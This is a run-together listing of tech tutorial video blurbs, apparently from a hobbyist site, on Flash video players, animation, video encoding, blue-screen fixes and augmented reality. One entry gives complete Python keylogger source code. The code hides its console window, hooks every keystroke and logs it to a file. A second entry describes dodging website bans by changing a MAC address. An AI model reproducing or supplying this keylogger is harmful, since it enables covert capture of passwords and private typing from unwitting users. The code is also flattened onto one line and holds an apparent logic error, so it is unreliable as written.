
This video compares the most popular virus scanners to see which one’s are the best.
KEYLOGGER SOURCECODE AND
– Download Python: http://www.python.org/
– Download Pyhook: pyhook.sourceforge.net
– Download Python for Windows Extensions: http://sourceforge.net/projects/pywin32/
SOURCE:
import win32api import win32console import win32gui import pythoncom, pyHook win = win32console.GetConsoleWindow() win32gui.ShowWindow(win,0) def OnKeyboardEvent(event): if event.Ascii==5: _exit(1) if event.Ascii != 0 or 8: f=open('c:output.txt','r') buffer=f.read() f.close() f=open('c:output.txt','w') keylogs=chr(event.Ascii) if event.Ascii==13: keylogs='/n' buffer += keylogs f.write(buffer) f.close() hm = pyHook.HookManager() hm.KeyDown = OnKeyboardEvent hm.HookKeyboard() pythoncom.PumpMessages()
You’ve just returned from vacation and have tons of videos to share. Create your own custom video player to showcase these memories online. Inspired by the Instructables project: http://www.instructables.com/id/How-To-Create-an-Adobe-Flash-Video-Player/
This video will show you how to bypass websites that have blocked you by changing your MAC address, which will change your IP address. You can download now download it from this link: http://www.tinkernut.com/demos/205_mac/macmakeup195d.zip
Static images can cause your web site to fade into the background. Learn the basics of animating them using Adobe Flash CS4. View the Instructables steps at: http://www.instructables.com/id/How-to-Animate-in-Adobe-Flash/
This video covers the basics of converting and encoding videos.
This video covers the basics of how to fix the most common Windows Blue Screen Errors, commonly referred to as the Blue Screen of Death (BSOD).
This video covers the very basics of creating an Augmented Reality (AR) application using FLARToolkit and Adobe Flex.
Download the marker: http://www.tinkernut.com/downl…..marker.pdf
Visit this webpage, allow access to your webcam, and hold the marker in front of the camera: http://www.tinkernut.com/downl…..ality.html
Download the source files here: http://www.tinkernut.com/downl…..eality.zip>
Don’t just send people a stack of static photo files; share them in style by creating a photo gallery in Flash.